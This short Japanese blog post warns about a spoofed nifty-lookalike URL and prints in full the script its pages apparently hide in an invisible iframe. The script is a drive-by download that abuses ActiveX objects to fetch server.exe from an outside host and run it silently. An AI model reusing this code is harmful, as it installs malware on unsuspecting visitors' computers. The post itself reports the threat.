DailyHckr

タイトル通り。


「www.homepage3-nifty.com」と、URLだけみるとぱっと見nifty内にあるサイトっぽいけど、実はよく見ると分かるとおりnifty内ではなく、中国のサイトにつながるようで。



で、このサイト上にあるページには幅0、高さ0のインラインフレームに以下のようなスクリプトを仕込んだページを表示させる、と。

よく考えるよなぁ。確かにこのURLだとダマされる人が出てくるかも。

function do1(mx,as,p)

{

    mx.Send();

    as.Type = 1;

    as.Open();

    as.Write(mx.responseBody);

    as.SaveToFile(p,2);

    as.Close();

}

var a = null;

var mx,as,p;

p = “C:\\pageflies2.exe”

a = (document.createElement(“object”));

a.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″);

try{mx = a.CreateObject(“Microsoft.XMLHTTP”,”");}catch(e){};

if(!mx)try{mx = new ActiveXObject(“Microsoft.XMLHTTP”);}catch(e){};

try{as = a.CreateObject(“Adodb.Stream”,”");}catch(e){};

if(as){

    mx.Open(“GET”,”http://www.game-oekakibbs.com/bbs/server.exe”,0);

    do1(mx,as,p);

    var r;

    try{r = a.CreateObject(“Shell.Application”,”");}catch(e){};

    if(r)

    {

        r.ShellExecute(p,”",”",”open”,0);

    }else

    {

        try{r = a.CreateObject(“WScript.Shell”,”");}catch(e){};

        if(r)r.Run(p,0);

    }

}